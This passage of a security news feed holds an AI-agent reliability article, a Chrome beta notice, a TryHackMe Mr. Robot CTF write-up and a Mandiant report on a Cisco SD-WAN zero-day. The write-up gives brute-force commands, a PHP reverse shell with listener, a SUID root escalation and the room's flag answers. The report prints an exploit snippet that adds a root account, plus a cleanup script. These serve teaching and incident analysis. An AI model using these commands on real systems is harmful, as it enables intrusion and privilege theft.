<title><![CDATA[Amazon will present its framework for engineering trustworthy AI agents at VB Transform 2026]]></title>
<description><![CDATA[AI agents are increasingly proficient at executing business tasks autonomously, but IT leaders are cautious about granting permissions to access enterprise systems. Part of the challenge lies in how AI reliability is measured. Industry standards often rely on EVAL scores, which provide a static s...]]></description>
<link>https://tsecurity.de/de/3622267/it-nachrichten/amazon-will-present-its-framework-for-engineering-trustworthy-ai-agents-at-vb-transform-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622267/it-nachrichten/amazon-will-present-its-framework-for-engineering-trustworthy-ai-agents-at-vb-transform-2026/</guid>
<pubDate>Wed, 24 Jun 2026 19:18:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>AI agents are increasingly proficient at executing business tasks autonomously, but IT leaders are cautious about granting permissions to access enterprise systems. </p><p>Part of the challenge lies in how <a href="https://venturebeat.com/technology/karpathys-march-of-nines-shows-why-90-ai-reliability-isnt-even-close-to">AI reliability</a> is measured. Industry standards often rely on EVAL scores, which provide a static snapshot of performance rather than a measure of overall reliability. These metrics can fail to capture predictability across prompts, environments, and input types, said Bryan Silverthorn, director of the AGI Autonomy research lab at Amazon.</p><p>Amazon’s AGI autonomy research lab is moving beyond raw performance benchmarks, focusing instead on a structured framework centered on consistency, robustness, predictability, and safety, Silverthorn told VentureBeat during an interview ahead of his session at <a href="https://venturebeat.com/vbtransform2026">VB Transform 2026</a>.</p><p>Rather than assuming that models can be harnessed into safety, Amazon’s approach emphasizes decoupled systems, such as sandboxed environments where agents propose changes that are reviewed by humans before implementation. </p><p>This strategy aims to bridge the trust gap by prioritizing verifiable interactions, even in highly sensitive domains like finance, where the potential damage an agent can cause is significant.</p><p>In VentureBeat’s Q2 Pulse Research survey of over 100 senior technology leaders and buyers, just 4% said they are comfortable relying on model guardrails alone. When asked what worries them most about model guardrails, 40% said unauthorized access to tools or data and 27% cited prompt manipulation or injection.</p><p>At VB Transform, Silverthorn will share details of Amazon’s approach to trustworthy agentic AI and how companies can move from single-agent wrappers to multi-tool architectures that can self-correct mid-execution during his session titled <b>Closing the capability-reliability gap: Inside Amazon’s framework for engineering trustworthy agents</b>.</p><p>Another agentic ops and evals-focused session at VentureBeat’s flagship conference, happening July 14 and 15 in Menlo Park, is <b>Intelligence at scale: How Waymo builds safe, efficient AI for the physical world</b> with speaker Manasi Joshi, director of systems intelligence and machine learning at Waymo. </p><p><i>Interested in attending VB Transform 2026? A select number of complimentary passes are also available to senior technology leaders. </i><a href="mailto:events@venturebeat.com"><i>Contact us </i></a><i>to get yours. You can also purchase tickets </i><a href="https://web.cvent.com/event/27401f5a-f49e-46fc-90a3-eee31c2a4818/register"><i>here</i></a><i>.</i>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe — Mr. Robot CTF | Full Write-Up]]></title>
<description><![CDATA[Platform: TryHackMeRoom: Mr. Robot CTFDifficulty: MediumAuthor: Shikhali Jamalzade (@alisalive)Date: May 2026Tags: #CTF #TryHackMe #WordPress #PrivilegeEscalation #PenTest #MrRobot“Give a man a gun and he can rob a bank. Give a man a bank and he can rob the world.” — Mr. RobotIntroductionThe Mr. ...]]></description>
<link>https://tsecurity.de/de/3621795/hacking/tryhackme-mr-robot-ctf-full-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621795/hacking/tryhackme-mr-robot-ctf-full-write-up/</guid>
<pubDate>Wed, 24 Jun 2026 16:55:16 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*oEKhllKIF6aLRt62C2KnOQ.png"></figure><h4><strong>Platform:</strong> <a href="https://tryhackme.com/p/alisalive.exe">TryHackMe</a><br><strong>Room:</strong> <a href="https://tryhackme.com/room/mrrobot">Mr. Robot CTF</a><br><strong>Difficulty:</strong> Medium<br><strong>Author:</strong> Shikhali Jamalzade (<a href="https://github.com/alisalive">@alisalive</a>)<br><strong>Date:</strong> May 2026<br><strong>Tags:</strong> #CTF #TryHackMe #WordPress #PrivilegeEscalation #PenTest #MrRobot</h4><p><em>“Give a man a gun and he can rob a bank. Give a man a bank and he can rob the world.”</em> — Mr. Robot</p><h3>Introduction</h3><p>The <strong>Mr. Robot CTF</strong> room on TryHackMe is inspired by the cult TV series of the same name — a show about hacking, manipulation, and power. Created by security researcher <strong>Leon Johnson</strong>, the room presents a realistic attack surface: a WordPress-powered web server with deliberately weak credentials and a classic privilege escalation vector involving a SUID binary.</p><p>Your mission: find <strong>3 hidden keys</strong> on the machine.</p><p>In this write-up, I’ll walk through every step of the compromise — from initial reconnaissance all the way to root. I’ll explain the <em>why</em> behind each tool and technique, not just the <em>how</em>.</p><h3>Environment Setup</h3><p>Before anything, connect to the TryHackMe VPN:</p><p>bash</p><pre>sudo openvpn your-config.ovpn</pre><p>Once connected, deploy the Mr. Robot machine from the room page. Note the assigned IP (referred to as &lt;TARGET_IP&gt; throughout this write-up).</p><h3>Phase 1 — Reconnaissance</h3><h3>Nmap Port Scan</h3><p>Every engagement begins with understanding the attack surface. We’ll use <strong>nmap</strong> to identify open ports, services, and versions.</p><p>bash</p><pre>nmap -sC -sV -T4 -oN nmap_scan.txt &lt;TARGET_IP&gt;</pre><p><strong>Flag breakdown:</strong></p><ul><li>-sC — Run default NSE scripts (useful for detecting common vulns and misconfigs)</li><li>-sV — Probe service versions</li><li>-T4 — Aggressive timing (faster on stable networks)</li><li>-oN — Save output to file for reference</li></ul><p><strong>Results:</strong></p><pre>PORT    STATE  SERVICE  VERSION<br>80/tcp  open   http     Apache httpd<br>443/tcp open   ssl/http Apache httpd<br>22/tcp  closed ssh</pre><p>Two web servers (HTTP + HTTPS) are running on a standard Apache stack. SSH is closed, so our initial foothold will be through the web.</p><h3>Phase 2 — Web Enumeration</h3><h3>Visiting the Website</h3><p>Navigate to http://&lt;TARGET_IP&gt; in your browser. You'll be greeted by an interactive terminal simulation themed around the Mr. Robot show. It's visually impressive but doesn't contain anything useful for exploitation — feel free to play around though.</p><h3>robots.txt — The First Lead</h3><p>A robots.txt file tells web crawlers which paths to avoid. It's frequently overlooked by developers, but for pentesters it's a goldmine.</p><p>bash</p><pre>curl http://&lt;TARGET_IP&gt;/robots.txt</pre><p><strong>Output:</strong></p><pre>User-agent: *<br>fsocity.dic<br>key-1-of-3.txt</pre><p>Two files are disclosed:</p><ul><li>fsocity.dic — a wordlist (we'll use this to brute-force WordPress)</li><li>key-1-of-3.txt — the first flag</li></ul><p>Download both immediately:</p><p>bash</p><pre>wget http://&lt;TARGET_IP&gt;/fsocity.dic<br>wget http://&lt;TARGET_IP&gt;/key-1-of-3.txt<br>cat key-1-of-3.txt</pre><blockquote><em>🚩 </em><strong><em>Key 1:</em></strong><em> </em><em>073403c8a58a1f80d943455fb30724b9</em></blockquote><h3>Directory Brute-Forcing with Gobuster</h3><p>To map the full attack surface, we enumerate hidden directories:</p><p>bash</p><pre>gobuster dir -u http://&lt;TARGET_IP&gt; -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50</pre><p>Key findings:</p><pre>/wp-login    (Status: 200)<br>/wp-admin    (Status: 301)<br>/robots      (Status: 200)<br>/readme      (Status: 200)<br>/sitemap     (Status: 200)<br>/wp-content  (Status: 301)</pre><p>The presence of /wp-login confirms this is a <strong>WordPress</strong> installation. This opens up a well-documented attack path.</p><h3>Phase 3 — WordPress Credential Brute-Force</h3><h3>Preparing the Wordlist</h3><p>The fsocity.dic file contains <strong>858,160 words</strong> — most of them duplicates. Running a brute-force with this as-is would waste significant time. We deduplicate it first:</p><p>bash</p><pre>wc -w fsocity.dic         # 858160 words<br>sort fsocity.dic | uniq &gt; fs-clean.txt<br>wc -w fs-clean.txt        # 11451 words — a 98.7% reduction</pre><p>Always optimize your wordlists before launching attacks. Speed matters in real engagements.</p><h3>Username Enumeration with Hydra</h3><p>WordPress gives different error messages depending on whether a username exists:</p><ul><li>Invalid username → ERROR: Invalid username.</li><li>Valid username, wrong password → ERROR: The password you entered for the username … is incorrect.</li></ul><p>We exploit this <strong>username enumeration</strong> vulnerability to find valid users first, then pivot to password brute-forcing.</p><p>Start by capturing a failed login request with <strong>Burp Suite</strong> to identify the POST parameters (log and pwd). Then launch Hydra:</p><p>bash</p><pre>hydra -L fs-clean.txt -p test &lt;TARGET_IP&gt; http-post-form \<br>  "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=Invalid username" -t 30</pre><ul><li>-L fs-clean.txt — username wordlist</li><li>-p test — static placeholder password (we only care about username validity here)</li><li>F=Invalid username — string that indicates a failed attempt (Hydra ignores these)</li></ul><p><strong>Result:</strong> Valid username found → elliot</p><h3>Password Brute-Force</h3><p>Now that we have a valid username, we brute-force the password using the same deduplicated list:</p><p>bash</p><pre>hydra -l elliot -P fs-clean.txt &lt;TARGET_IP&gt; http-post-form \<br>  "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=The password you entered for the username" -t 30</pre><p><strong>Result:</strong> Password found → ER28-0652</p><p><strong>Alternative — WPScan:</strong></p><p>bash</p><pre>wpscan --url http://&lt;TARGET_IP&gt; -U elliot -P fs-clean.txt -t 50</pre><p>WPScan is purpose-built for WordPress and tends to be faster for this specific task.</p><h3>Phase 4 — WordPress Remote Code Execution</h3><h3>Gaining Admin Access</h3><p>Navigate to http://&lt;TARGET_IP&gt;/wp-login.php and log in with:</p><ul><li><strong>Username:</strong> elliot</li><li><strong>Password:</strong> ER28-0652</li></ul><p>Elliot has full administrator privileges. Welcome to the dashboard.</p><h3>Uploading a PHP Reverse Shell</h3><p>WordPress administrators can edit theme template files — raw PHP. This is our injection point.</p><p>Navigate to: <strong>Appearance → Theme Editor → Select a template (e.g., </strong><strong>archive.php or </strong><strong>404.php)</strong></p><p>Replace the entire file content with <strong>PentestMonkey’s PHP reverse shell</strong>:</p><pre>https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php</pre><p>Before saving, edit these two lines to match your attacking machine:</p><p>php</p><pre>$ip = '&lt;YOUR_ATTACKING_IP&gt;';   // your TryHackMe VPN IP (tun0)<br>$port = 4444;                   // or any port you choose</pre><p>Click <strong>Update File</strong>.</p><h3>Setting Up the Listener</h3><p>On your attacking machine:</p><p>bash</p><pre>nc -lvnp 4444</pre><h3>Triggering the Shell</h3><p>Now visit the modified template URL in your browser. For the archive.php template, it would be:</p><pre>http://&lt;TARGET_IP&gt;/wp-content/themes/twentyfifteen/archive.php</pre><p>Check your terminal — you should have a reverse shell as daemon:</p><p>bash</p><pre>$ whoami<br>daemon</pre><h3>Phase 5 — Post-Exploitation &amp; Key 2</h3><h3>Exploring the Filesystem</h3><p>Navigate to the home directory:</p><p>bash</p><pre>cd /home/robot<br>ls -la</pre><p><strong>Output:</strong></p><pre>-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt<br>-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5</pre><p>We can see key-2-of-3.txt, but it's only readable by the robot user. However, password.raw-md5 is world-readable:</p><p>bash</p><pre>cat password.raw-md5</pre><p><strong>Output:</strong></p><pre>robot:c3fcd3d76192e4007dfb496cca67e13b</pre><h3>Cracking the MD5 Hash</h3><p>The hash format is MD5 (hinted by the filename). Crack it using:</p><p><strong>Option 1 — CrackStation (online):</strong> Paste the hash at <a href="https://crackstation.net/">crackstation.net</a></p><p><strong>Option 2 — John the Ripper:</strong></p><p>bash</p><pre>echo "c3fcd3d76192e4007dfb496cca67e13b" &gt; hash.txt<br>john hash.txt --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt</pre><p><strong>Option 3 — Hashcat:</strong></p><p>bash</p><pre>hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt</pre><p><strong>Result:</strong> abcdefghijklmnopqrstuvwxyz</p><h3>Spawning a Proper TTY Shell</h3><p>Before switching users, we need a fully interactive terminal. Our current shell is a limited “dumb” shell that doesn’t support su. Fix it with Python's pty module:</p><p>bash</p><pre>python -c 'import pty; pty.spawn("/bin/bash")'</pre><p>Now switch to the robot user:</p><p>bash</p><pre>su robot<br># Password: abcdefghijklmnopqrstuvwxyz</pre><p>Read the second key:</p><p>bash</p><pre>cat /home/robot/key-2-of-3.txt</pre><blockquote><em>🚩 </em><strong><em>Key 2:</em></strong><em> </em><em>822c73956184f694993bebb3eb32f0bf</em></blockquote><h3>Phase 6 — Privilege Escalation to Root</h3><p>With robot, we still can't read the third key (located in /root). We need to escalate to root.</p><h3>Finding SUID Binaries</h3><p>SUID (Set User ID) binaries run with the permissions of their <strong>owner</strong> (often root), regardless of who executes them. This is a common and powerful escalation vector.</p><p>bash</p><pre>find / -perm -u=s -type f 2&gt;/dev/null</pre><p>Scan the results. Something unusual stands out:</p><pre>/usr/local/bin/nmap</pre><p><strong>Nmap with SUID?</strong> That’s misconfigured. Older versions of nmap (2.02–5.21) include an --interactive mode that allows shell command execution.</p><h3>GTFOBins — nmap Interactive Mode</h3><p>Verify on <a href="https://gtfobins.github.io/gtfobins/nmap/">GTFOBins</a>:</p><p>bash</p><pre>nmap --interactive</pre><p>Once in nmap’s interactive prompt:</p><pre>nmap&gt; !sh</pre><p>Check your privilege level:</p><p>bash</p><pre>whoami<br># root</pre><p>You now have a root shell.</p><h3>Capturing the Final Key</h3><p>bash</p><pre>cat /root/key-3-of-3.txt</pre><blockquote><em>🚩 </em><strong><em>Key 3:</em></strong><em> </em><em>04787ddef27c3dee1ee161b21670b4e4</em></blockquote><h3>Attack Chain Summary</h3><pre>robots.txt disclosure<br>        ↓<br>Key 1 found (public file)<br>        ↓<br>WordPress discovered via gobuster<br>        ↓<br>Username enumerated via error message difference<br>        ↓<br>Password cracked via Hydra + fsocity.dic wordlist<br>        ↓<br>Admin access → PHP reverse shell injected into theme<br>        ↓<br>Shell as daemon → /home/robot/ explored<br>        ↓<br>MD5 hash cracked → su robot → Key 2<br>        ↓<br>SUID nmap found → nmap --interactive → !sh → root<br>        ↓<br>Key 3 captured</pre><h3>Lessons Learned</h3><p><strong>1. robots.txt is not security.</strong> It’s a disclosure mechanism by design — never put sensitive file paths there.</p><p><strong>2. WordPress login pages expose usernames.</strong> The different error messages for “invalid username” vs “wrong password” enable user enumeration. This is a long-standing WordPress issue.</p><p><strong>3. Wordlist hygiene matters.</strong> Deduplicating fsocity.dic reduced it from 858,160 to 11,451 entries — making the brute-force ~75x faster. Never throw raw wordlists at targets.</p><p><strong>4. Theme editors are code execution.</strong> Any CMS that lets admins write raw PHP to disk is one compromised account away from full RCE.</p><p><strong>5. SUID misconfigurations are everywhere.</strong> Always run find / -perm -u=s -type f 2&gt;/dev/null on post-exploitation. Cross-reference with GTFOBins.</p><p><strong>6. MD5 is not encryption.</strong> It’s a hashing algorithm, and short/predictable passwords will fall to rainbow tables instantly. Use bcrypt, Argon2, or scrypt for password storage.</p><h3>Tools Used</h3><p>Tool Purpose nmap Port scanning &amp; service enumeration gobuster Directory brute-forcing Burp Suite HTTP request interception &amp; analysis Hydra Credential brute-forcing WPScan WordPress-specific enumeration Pentest Monkey PHP Reverse Shell Remote code execution payload Netcat Reverse shell listener John the Ripper / Hashcat Hash cracking GTFOBins SUID exploitation reference</p><h3>Flags</h3><p>1073403c8a58a1f80d943455fb30724b9<br>2822c73956184f694993bebb3eb32f0bf<br>304787ddef27c3dee1ee161b21670b4e4</p><p><em>Thanks for reading. If you have questions or spotted a better path, drop a comment — I’m always up for discussing alternative techniques.</em></p><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.<br></em>and my <a href="https://tryhackme.com/p/alisalive.exe"><em>TryHackMe</em></a></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=f28d83777dde" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/tryhackme-mr-robot-ctf-full-write-up-f28d83777dde">TryHackMe — Mr. Robot CTF | Full Write-Up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for Android Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Beta 150 (150.0.7871.46) for Android. It's now available on Google Play.You can see a partial list of the changes in the Git log. For details on new features, check out the Chromium blog, and for details on web platform updates, check here.If you find a new...]]></description>
<link>https://tsecurity.de/de/3621762/it-security-nachrichten/chrome-beta-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621762/it-security-nachrichten/chrome-beta-for-android-update/</guid>
<pubDate>Wed, 24 Jun 2026 16:54:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Beta 150 (150.0.7871.46) for Android. It's now available on <a href="https://play.google.com/store/apps/details?id=com.chrome.beta">Google Play</a>.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.28..150.0.7871.46?pretty=fuller&amp;n=10000">Git log</a>. For details on new features, check out the <a href="https://blog.chromium.org/">Chromium blog</a>, and for details on web platform updates, check <a href="https://www.chromestatus.com/features#milestone%3D150">here</a>.</p><p>If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zero-Day Exploitation of Vulnerability (CVE-2026-20245) in Cisco Catalyst SD-WAN Manager]]></title>
<description><![CDATA[Written by: Chester Sng, Pete Boonyakarn, Logeswaran Nadarajan

Introduction 
In early 2026, Mandiant identified a threat actor targeting SD-WAN infrastructure at a service provider. After gaining initial access, the threat actor exploited a zero-day vulnerability (CVE-2026-20245) in Cisco Cataly...]]></description>
<link>https://tsecurity.de/de/3621686/it-security-nachrichten/zero-day-exploitation-of-vulnerability-cve-2026-20245-in-cisco-catalyst-sd-wan-manager/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621686/it-security-nachrichten/zero-day-exploitation-of-vulnerability-cve-2026-20245-in-cisco-catalyst-sd-wan-manager/</guid>
<pubDate>Wed, 24 Jun 2026 16:23:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Chester Sng, Pete Boonyakarn, Logeswaran Nadarajan</p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Introduction</span><strong> </strong></h3>
<p><span>In early 2026, Mandiant identified a threat actor targeting SD-WAN infrastructure at a service provider. After gaining initial access, the threat actor exploited a zero-day vulnerability (</span><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-privesc-4uxFrdzx" rel="noopener" target="_blank"><span>CVE-2026-20245</span></a><span>) in Cisco Catalyst SD-WAN to escalate privileges from a compromised administrative account to root-level access.</span></p>
<p><span>The vulnerability stems from the device’s file upload feature lacking the ability to properly filter malicious data.</span></p>
<p><span>Throughout the intrusion, to maintain operational security and avoid detection, the threat actor consistently employed anti-forensic techniques, selectively deleting and restoring system configuration files that were modified during their activities.</span></p>
<h3><span>Key Observations</span></h3>
<ul>
<li aria-level="1">
<p role="presentation"><span><strong>Rogue Peering and Credential Manipulation</strong><span>: In March 2026, a threat actor established initial access via unauthorized peering connections to facilitate Secure Shell (SSH) access. The threat actor used that access to manipulate default account passwords to evade detection</span>.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Exploitation of CVE-2026-20245</strong><span>: Subsequently, the attacker leveraged a zero-day privilege escalation vulnerability (now tracked as CVE-2026-20245) in Cisco Catalyst SD-WAN Manager to gain root-level access via a malicious CSV upload.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Extensive Anti-Forensic Cleanup</strong><span>: The threat actor deleted malicious files, reverted configuration changes, and executed a validation script to ensure indicators are purged</span>.</p>
</li>
</ul>
<h3><span>What is SD-WAN?</span></h3>
<p><span>Traditional Wide Area Networks (WANs) rely heavily on physical, proprietary hardware routers to direct traffic. This model is often rigid, complex to scale, and struggles to handle the demands of modern cloud computing.</span></p>
<p><span><span>Software-Defined Wide Area Network (SD-WAN) solves this by decoupling the network’s management and control logic from the underlying physical hardware. Instead of configuring individual routers one by one, a centralized software controller is used to orchestrate the entire network from a single dashboard. SD-WANs are typically used by highly distributed organizations, such as banks, retail corporations, technology services, and healthcare providers, to securely connect multiple remote branch locations directly to central cloud services</span>.</span></p>
<h4><span>What is Peering?</span></h4>
<p><span>Within an SD-WAN fabric, peering is the logical process of establishing a trusted, authenticated relationship between distinct network components, such as edge routers, regional hubs, and central controllers.</span></p>
<p><span>Before any data can be securely transmitted across the network fabric, these devices must perform a digital handshake. During the peering phase, devices mutually authenticate each other using cryptographic certificates. Once identity and trust are verified, they exchange underlying routing tables and automatically build secure tunnels to facilitate safe data transport. </span></p>
<h4><span>Additional Vulnerabilities in Cisco Catalyst SD-WAN Controllers</span></h4>
<p><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk" rel="noopener" target="_blank"><span>CVE-2026-20127</span></a><span> and </span><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW" rel="noopener" target="_blank"><span>CVE-2026-20182</span></a><span> are critical vulnerabilities recently disclosed by Cisco that affect the peering authentication mechanism for Cisco Catalyst SD-WAN controllers. Both vulnerabilities could allow an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges.</span></p>
<h3><span>Intrusion Campaign Overview</span></h3>
<h4><span>Initial Access Via Rogue Peering Connections</span></h4>
<p><span><span>From late 2025 to January 2026, Mandiant observed multiple unauthorized peering connections to the victim’s SD-WAN Manager devices. It is possible that these connections occurred due to the exploitation of CVE-2026-20127 or CVE-2026-20182 as the vulnerabilities were not disclosed, and patches were not available during this period</span>.</span></p>
<p><span>Beginning in March 2026, further unauthorized peering connections were seen on a device running a software version unaffected by CVE-2026-20127. However, Cisco confirmed that these connections did not leverage CVE-2026-20182 either, and could instead be using stolen certificate material from a previous compromise of the same device.</span></p>
<p><span>It is unclear if the same threat actor was responsible for the late 2025 to January 2026 and March 2026 rogue peering activity. </span></p>
<h4><span>Successful Authentications By Altering The Admin Account Password</span></h4>
<p><span>In March 2026, the threat actor established new rogue peer connections and successfully authenticated to the SD-WAN Manager device via SSH using the </span><code>vmanage-admin</code><span> account on the same victim devices.</span></p>
<p><span>Once authenticated via SSH, the threat actor executed commands to change the password of the default </span><code>admin</code><span> account. The threat actor authenticated directly to the SD-WAN Manager web application interface using the </span><code>admin</code><span> account and exfiltrated configurations of the SD-WAN fabric.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>[2026-03-07T01:31:48.464Z]"POST /j_security_check HTTP/1.1" 200 - 31 0 1288 - "&lt;Threat Actor Control Plane IP&gt;" "Mozilla/5.0" "&lt;Log ID&gt;" "&lt;SD-WAN Manager IP&gt;:8443" "127.0.0.1:8080"
[2026-03-07T01:31:49.017Z] "GET /dataservice/system/device/vedges HTTP/1.1" 200 - 0 10114 127 - "&lt;Threat Actor Control Plane IP&gt;" "Mozilla/5.0" "&lt;Log ID&gt;" "&lt;SD-WAN Manager IP&gt;:8443" "127.0.0.1:8080"
[2026-03-07T01:31:50.017Z] "GET /dataservice/system/device/controllers HTTP/1.1" 200 - 0 15815 100 - "&lt;Threat Actor Control Plane IP&gt;" "Mozilla/5.0" "&lt;Log ID&gt;" "&lt;SD-WAN Manager IP&gt;:8443" "127.0.0.1:8080"
[2026-03-07T01:31:51.925Z] "GET /dataservice/template/config/attached/&lt;Device ID&gt; HTTP/1.1" 200 - 0 3732 18 - "&lt;Threat Actor Control Plane IP&gt;" "Mozilla/5.0" "&lt;Log ID&gt;" "&lt;SD-WAN Manager IP&gt;:8443" "127.0.0.1:8080"
[2026-03-07T01:31:52.493Z] "GET /dataservice/template/config/running/&lt;Device ID&gt; HTTP/1.1" 400 - 0 134 19 - "&lt;Threat Actor Control Plane IP&gt;" "Mozilla/5.0" "&lt;Log ID&gt;" "&lt;SD-WAN Manager IP&gt;:8443" "127.0.0.1:8080"
&lt;...&gt;</code></pre>
<p><span><span>Figure 1: Threat actor authentication and configuration extraction</span></span></p></div>
<div class="block-paragraph_advanced"><p><span><span>The threat actor subsequently used their active </span><code>vmanage-admin</code><span> session to change the password of the </span><code>admin</code><span> account back to its original state before terminating their active session. This activity was likely performed to reduce the probability of detection by an administrator trying to log into the device during day-to-day operations</span>.</span></p>
<p><span>The </span><code>vmanage-admin</code><span> and </span><code>admin</code><span> accounts are default accounts on Cisco Catalyst SD-WAN controllers that have different privileges, but </span><a href="https://www.cisco.com/c/en/us/td/docs/routers/sdwan/17-x/systems-interfaces/systems-interfaces-guide-17-x/users-and-access.html" rel="noopener" target="_blank"><span>neither possesses root shell access</span></a><span>.</span></p>
<h4><span>Exploitation of CVE-2026-20245 to Escalate Privileges</span></h4>
<p><span>After establishing an SSH session with the </span><code>admin</code><span> account, the threat actor exploited CVE-2026-20245 by executing the following command to upload a file named </span><code>evil_tenant.csv</code><span>:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>request tenant-upload tenant-list /home/admin/evil_tenant.csv vpn 0</code></pre>
<p><span><span>Figure 2: Malicious file upload</span></span></p></div>
<div class="block-paragraph_advanced"><p><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-privesc-4uxFrdzx" rel="noopener" target="_blank"><span>CVE-2026-20245</span></a><span>, a vulnerability reported to Cisco by Mandiant, exists in the command-line interface (CLI) of Cisco Catalyst SD-WAN Controllers that could allow an authenticated, local attacker to execute arbitrary commands as root by supplying a crafted file to the affected system.</span></p>
<p><span>The </span><code>evil_tenant.csv</code><span> file contains the exploit payload. The following code block (Figure 3) shows a snippet of the exploit which attempts to append malicious entries to the system's </span><code>/etc/passwd</code><span> and </span><code>/etc/shadow</code><span> files.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>if [ -e /usr/share/viptela/vbond_vsmart_tenant_list ] &amp;&amp; grep -q '&lt;redacted&gt;' /usr/share/viptela/vbond_vsmart_tenant_list 2&gt;/dev/null; then
    echo absent &gt; /home/admin/.orig_vbond_vsmart_tenant_list.state;
elif [ -e /usr/share/viptela/vbond_vsmart_tenant_list ]; then
    echo present &gt; /home/admin/.orig_vbond_vsmart_tenant_list.state;
    cp -a /usr/share/viptela/vbond_vsmart_tenant_list /home/admin/.orig_vbond_vsmart_tenant_list;
else
    echo absent &gt; /home/admin/.orig_vbond_vsmart_tenant_list.state;
fi;
cp -a /etc/passwd /home/admin/.orig_passwd;
cp -a /etc/shadow /home/admin/.orig_shadow;
grep -q '^troot:' /etc/passwd || echo 'troot:x:0:0:root:/root:/bin/bash' &gt;&gt; /etc/passwd;
grep -q '^troot:' /etc/shadow || echo 'troot:&lt;redacted&gt;:19000:0:99999:7:::' &gt;&gt; /etc/shadow</code></pre>
<p><span><span>Figure 3: Appending malicious entries</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>Through this command, the threat actor achieved the following:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Backed up the original </span><code>vbond_vsmart_tenant_list</code><span> configuration file, which would have been overwritten by the contents of </span><code>evil_tenant.csv</code><span> during the exploit. This backup was likely created to allow the actor to restore the file later, ensuring the SD-WAN Manager device did not load an invalid configuration that might alert administrators.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Created backups of the original </span><code>/etc/passwd</code><span> and </span><code>/etc/shadow</code><span> files.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Created a user account named </span><code>troot</code><span> with full root privileges.</span></p>
</li>
</ul>
<p><span>Mandiant subsequently observed the threat actor accessing this new </span><code>troot</code><span> account from the </span><code>admin</code><span> account via the </span><code>su</code><span> (substitute user) command.</span></p>
<h4><span>Anti-Forensic Techniques</span></h4>
<p><span><span>Mandiant identified that the threat actor deleted all files they created, including </span><code>evil_tenant.csv</code><span>, and restored any system configurations they modified. These deletion and modifications were done to minimize their forensic footprint</span>. </span></p>
<p><span>In addition to this, Mandiant also observed execution of a validation script, which checks if indicators of the threat actor's activities are removed. </span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>for f in /home/admin/evil_tenant.csv /home/admin/.orig_vbond_vsmart_tenant_list /home/admin/.orig_vbond_vsmart_tenant_list.state /home/admin/.orig_passwd /home/admin/.orig_shadow; 
    do if [ -e "$f" ]; 
        then echo PRESENT:$f; ls -ld "$f"; 
        else echo ABSENT:$f; 
    fi; 
done; 

if grep -q '^troot:' /etc/passwd; 
    then echo PRESENT:/etc/passwd:troot; 
    else echo ABSENT:/etc/passwd:troot; 
fi; 

if [ -e /usr/share/viptela/vbond_vsmart_tenant_list ]; 
    then echo PRESENT:/usr/share/viptela/vbond_vsmart_tenant_list; ls -ld /usr/share/viptela/vbond_vsmart_tenant_list; 
    else echo ABSENT:/usr/share/viptela/vbond_vsmart_tenant_list; 
fi</code></pre>
<p><span><span>Figure 4: Validation script</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>This script checks for the presence of the following:</span></p>
<ul>
<li aria-level="1">
